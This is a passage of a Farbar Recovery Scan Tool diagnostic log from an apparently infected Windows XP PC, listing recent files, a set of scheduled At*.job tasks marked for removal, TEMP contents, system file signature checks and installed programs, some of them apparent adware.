2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 19:52 - 2009-08-22 04:19 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\PowerDVD DX
2014-08-31 19:52 - 2009-08-22 04:15 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Sun
2014-08-31 19:52 - 2009-08-22 04:14 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Windows Desktop Search
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:26 - 2014-09-01 11:58 - 00983040 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-28 19:17 - 2014-08-28 19:47 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SysutilHiggs
2014-08-28 19:16 - 2014-08-28 19:46 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\CottonNoteworthy
2014-08-28 19:15 - 2014-08-28 19:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterRadio
2014-08-28 19:15 - 2014-08-28 19:17 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterHumble

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 12:38 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Temp
2014-09-01 12:36 - 2011-11-18 17:59 - 00001324 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-09-01 12:34 - 2014-09-01 12:29 - 00000000 ____D () C:\FRST
2014-09-01 12:28 - 2014-01-01 21:55 - 00000416 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{437A7727-9511-41A1-9450-7A7409618CA2}.job
2014-09-01 12:25 - 2012-06-05 19:32 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-09-01 12:15 - 2014-09-01 10:57 - 00045939 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 12:13 - 2010-05-25 13:03 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-01 12:09 - 2010-05-25 13:03 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-01 12:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At26.job
2014-09-01 11:58 - 2014-08-31 14:26 - 00983040 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-09-01 11:50 - 2014-09-01 11:50 - 00000310 _____ () C:\WINDOWS\Tasks\HP WEP.job
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:41 - 2014-01-01 22:04 - 00000000 ____D () C:\Documents and Settings\LW\My Documents\QickBooks_Files
2014-09-01 11:41 - 2011-09-01 13:01 - 00000000 ____D () C:\Program Files\Workspace
2014-09-01 11:39 - 2014-09-01 11:38 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:39 - 2014-09-01 11:38 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:39 - 2014-02-04 21:37 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Mozilla
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 11:38 - 2010-05-24 19:48 - 00000278 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-09-01 11:38 - 2008-04-25 12:16 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
2014-09-01 11:37 - 2014-09-01 10:57 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 11:37 - 2014-01-01 22:41 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-09-01 11:37 - 2014-01-01 22:41 - 00000048 _____ () C:\WINDOWS\wiaservc.log
2014-09-01 11:37 - 2008-04-25 17:32 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-09-01 11:33 - 2014-09-01 00:02 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 11:23 - 2013-03-22 18:19 - 00000213 ___SH () C:\boot.ini
2014-09-01 11:23 - 2009-12-25 13:47 - 00000000 ____D () C:\WINDOWS\pss
2014-09-01 11:23 - 2008-04-25 12:16 - 00000603 _____ () C:\WINDOWS\win.ini
2014-09-01 11:23 - 2008-04-25 12:16 - 00000227 _____ () C:\WINDOWS\system.ini
2014-09-01 11:21 - 2014-01-01 21:50 - 00000278 ___SH () C:\Documents and Settings\LW\ntuser.ini
2014-09-01 11:06 - 2014-01-01 21:50 - 00032452 _____ () C:\WINDOWS\SchedLgU.Txt
2014-09-01 10:59 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 10:57 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-09-01 10:57 - 2014-02-25 11:09 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-01 10:57 - 2012-07-02 21:03 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-01 10:57 - 2012-01-04 15:53 - 00000000 ____D () C:\WINDOWS\Minidump
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:54 - 2014-08-31 23:53 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:43 - 2014-08-31 23:31 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:31 - 2011-08-28 03:25 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Norton
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 23:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At48.job
2014-08-31 23:04 - 2014-08-31 19:52 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 22:09 - 2014-01-01 21:50 - 00001601 _____ () C:\Documents and Settings\LW\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 22:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At46.job
2014-08-31 21:37 - 2008-04-25 17:29 - 00001601 _____ () C:\Documents and Settings\Default User\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:20 - 2008-04-25 17:32 - 00001601 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:12 - 2014-08-31 21:09 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At44.job
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:50 - 2009-12-31 18:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ParetoLogic
2014-08-31 20:49 - 2009-12-31 18:33 - 00000000 ____D () C:\Program Files\ParetoLogic
2014-08-31 20:47 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At49.job
2014-08-31 20:27 - 2014-08-31 19:52 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:24 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 20:24 - 2011-03-24 16:51 - 00000684 _____ () C:\Documents and Settings\All Users\Desktop\CCleaner.lnk
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\CCleaner
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:23 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 20:22 - 2010-05-24 19:47 - 00000000 ____D () C:\Program Files\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 20:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At42.job
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 15:50 - 2009-08-31 05:33 - 00000000 ____D () C:\WINDOWS\system32\appmgmt
2014-08-31 15:20 - 2014-01-01 21:51 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Amadeus
2014-08-31 15:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At32.job
2014-08-31 14:30 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At51.job
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:21 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\security
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:15 - 2008-04-25 17:34 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-31 14:15 - 2008-04-25 17:25 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-31 14:15 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\Help
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-31 14:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At30.job
2014-08-31 13:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At28.job
2014-08-31 11:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At24.job
2014-08-31 10:15 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At1.job
2014-08-31 10:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At22.job
2014-08-31 09:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At20.job
2014-08-31 08:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At18.job
2014-08-31 07:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At16.job
2014-08-31 06:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At14.job
2014-08-31 05:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At12.job
2014-08-31 04:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At10.job
2014-08-31 03:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At8.job
2014-08-31 02:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At6.job
2014-08-31 01:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At4.job
2014-08-31 00:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At2.job
2014-08-30 19:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At40.job
2014-08-30 18:42 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At50.job
2014-08-30 18:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At38.job
2014-08-30 17:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At36.job
2014-08-30 16:08 - 2011-11-19 12:26 - 00000348 _____ () C:\WINDOWS\Tasks\At34.job
2014-08-30 08:17 - 2013-08-02 12:07 - 00000284 _____ () C:\WINDOWS\Tasks\AppleSoftwareUpdate.job
2014-08-29 04:15 - 2009-08-30 17:02 - 00000000 ____D () C:\Program Files\Automatic Update
2014-08-29 01:57 - 2009-12-31 18:36 - 00000380 _____ () C:\WINDOWS\Tasks\DriverCure.job
2014-08-28 20:54 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW
2014-08-28 19:50 - 2014-08-28 19:15 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterRadio
2014-08-28 19:47 - 2014-08-28 19:17 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SysutilHiggs
2014-08-28 19:46 - 2014-08-28 19:16 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\CottonNoteworthy
2014-08-28 19:17 - 2014-08-28 19:15 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterHumble
2014-08-27 23:39 - 2014-01-01 22:20 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Intuit
2014-08-27 23:38 - 2010-02-26 15:12 - 00000090 _____ () C:\WINDOWS\QBChanUtil_Trigger.ini
2014-08-27 17:52 - 2010-05-24 19:48 - 00000286 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-08-23 10:28 - 2014-02-13 19:42 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\HpUpdate
2014-08-13 15:13 - 2014-07-24 18:07 - 00001815 _____ () C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk

Files to move or delete:
====================
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At10.job
C:\Windows\Tasks\At12.job
C:\Windows\Tasks\At14.job
C:\Windows\Tasks\At16.job
C:\Windows\Tasks\At18.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At20.job
C:\Windows\Tasks\At22.job
C:\Windows\Tasks\At24.job
C:\Windows\Tasks\At26.job
C:\Windows\Tasks\At28.job
C:\Windows\Tasks\At30.job
C:\Windows\Tasks\At32.job
C:\Windows\Tasks\At34.job
C:\Windows\Tasks\At36.job
C:\Windows\Tasks\At38.job
C:\Windows\Tasks\At4.job
C:\Windows\Tasks\At40.job
C:\Windows\Tasks\At42.job
C:\Windows\Tasks\At44.job
C:\Windows\Tasks\At46.job
C:\Windows\Tasks\At48.job
C:\Windows\Tasks\At49.job
C:\Windows\Tasks\At50.job
C:\Windows\Tasks\At51.job
C:\Windows\Tasks\At6.job
C:\Windows\Tasks\At8.job


Some content of TEMP:
====================
C:\Documents and Settings\LW\Local Settings\Temp\CitrixOnlineLauncher.exe
C:\Documents and Settings\LW\Local Settings\Temp\InstHelper.exe
C:\Documents and Settings\LW\Local Settings\Temp\laiava92.dll
C:\Documents and Settings\Mr W\Local Settings\Temp\SHSetup.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:31-08-2014 02
Ran by LW at 2014-09-01 12:40:22
Running from C:\Documents and Settings\LW\My Documents\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 6.0 (Disabled - Up to date) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

24im (Remove Only) (HKLM\...\24im) (Version:  - 24im LLC)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 11.9.900.117 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
Amadeus FXG (HKLM\...\{32EE59BC-4642-4CC5-810F-4A7720C89EF3}) (Version: 1.2.3 - Amadeus North America)
Amadeus NA Library (HKLM\...\InstallShield_{B39B4400-4621-4AB7-BCDF-760626FB1027}) (Version: 2.0.0 - Amadeus North America)
Amadeus NA Library (Version: 2.0.0 - Amadeus North America) Hidden
Amadeus RailKey Agent  (HKLM\...\{83E92A83-EFB1-4699-A1E5-E3784235FB65}) (Version: 1.0.3 - Amadeus)
Apple Application Support (HKLM\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AXIS Media Control Embedded (HKLM\...\AXIS Media Control Embedded) (Version:  - )
Broadcom Gigabit NetLink Controller (HKLM\...\{9AF0B106-56F1-461B-A270-95BC1682E282}) (Version: 11.21.01 - Broadcom Corporation)
Broadcom Management Programs (HKLM\...\{7BB045C3-D5E4-4620-B536-DC11AACD5942}) (Version: 11.66.01 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.17 - Piriform)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Cisco WebEx Meetings (HKLM\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6514.5001 - Microsoft Corporation)
Dell Backup and Recovery Manager (HKLM\...\{AE60F600-FD60-40C4-A990-72F9BFEE475C}) (Version: 1.0.0 - Dell, Inc.)
Dell Resource CD (HKLM\...\{42929F0F-CE14-47AF-9FC7-FF297A603021}) (Version: 1.00.0000 - Dell Inc.)
ESET NOD32 Antivirus (HKLM\...\{0D343FFE-2FDD-45E3-92B4-159D4FE6F4D5}) (Version: 6.0.314.0 - ESET, spol s r. o.)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
GoToAssist Customer 2.1.0.715 (HKLM\...\GoToAssist Express Customer) (Version: 2.1.0.715 - Citrix Online)
GoToMyPC (HKLM\...\{5FAB6702-2810-4C95-9840-876C2D6D12A5}) (Version: 8.1.1337 - Citrix Online)
HP FWUpdateEDO3 (HKLM\...\{A82D0C46-EBDF-4B27-A731-D06EF2056E81}) (Version: 1.0.0.0 - Hewlett-Packard Company)
HP LaserJet P1500 series (HKLM\...\HP LaserJet P1500 series) (Version:  - )
HP LaserJet Professional M1530 MFP Series (HKLM\...\{74280B5D-A0AF-46c5-9C85-D9EA078262F1}) (Version:  - Hewlett-Packard)
HP LJ M1530 MFP Series HP Scan (HKLM\...\{C05002F1-06F8-4A15-B6F8-E4DC655C28AA}) (Version: 1.0.302.0 - Hewlett-Packard Co.)
HP Update (HKLM\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HPCarePackCore (HKLM\...\{7B02BF60-796D-4616-908B-B31A63CFDEFB}) (Version: 10.0.0.1 - Hewlett-Packard)
HPCarePackProducts (Version: 1.0.0.1 - HP) Hidden
HPLaserJetHelp_LearnCenter (HKLM\...\{B2AA0F22-E167-4C4A-BAE2-E0025028E61B}) (Version: 1.02.0000 - Hewlett-Packard)
HPLJUT (Version: 1.00.0012 - HP) Hidden
hppFaxDrvM1530 (Version: 003.000.00001 - Hewlett-Packard) Hidden
hppFaxUtilityM1530 (Version: 000.002.00001 - Hewlett-Packard) Hidden
hppLaserJetService (Version: 002.015.00599 - Hewlett-Packard) Hidden
hppM1530LaserJetService (Version: 001.008.00477 - Hewlett-Packard) Hidden
hppSendFaxM1530 (Version: 003.000.00001 - Hewlett-Packard) Hidden
hppTLBXFXM1530 (Version: 001.012.00948 - Hewlett-Packard) Hidden
HPSSupply (HKLM\...\{7902E313-FF0F-4493-ACB1-A8147B78DCD0}) (Version: 2.1.1.0000 - Hewlett Packard Development Company L.P.)
hpzTLBXFX (Version: 006.015.01163 - Hewlett-Packard) Hidden
I.R.I.S. OCR (HKLM\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Java™ 6 Update 15 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216013FF}) (Version: 6.0.150 - Sun Microsystems, Inc.)
Malwarebytes' Anti-Malware version 1.51.2.1300 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.51.2.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 1.1 Security Update (KB2572067) (HKLM\...\M2572067) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Internationalized Domain Names Mitigation APIs (Version:  - Microsoft Corporation) Hidden
Microsoft National Language Support Downlevel APIs (Version:  - Microsoft Corporation) Hidden
Microsoft Office 2003 Primary Interop Assemblies (HKLM\...\{91490409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.6553.0 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft PowerPoint Viewer (HKLM\...\{95140000-00AF-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (Version: 8.0.60940.0 - Microsoft Corporation) Hidden
Microsoft XML Parser (Version: 8.70.1104.04 - Microsoft Corporation) Hidden
Mozilla Firefox 30.0 (x86 en-US) (HKLM\...\Mozilla Firefox 30.0 (x86 en-US)) (Version: 30.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
MSXML 4.0 SP2 (KB936181) (HKLM\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
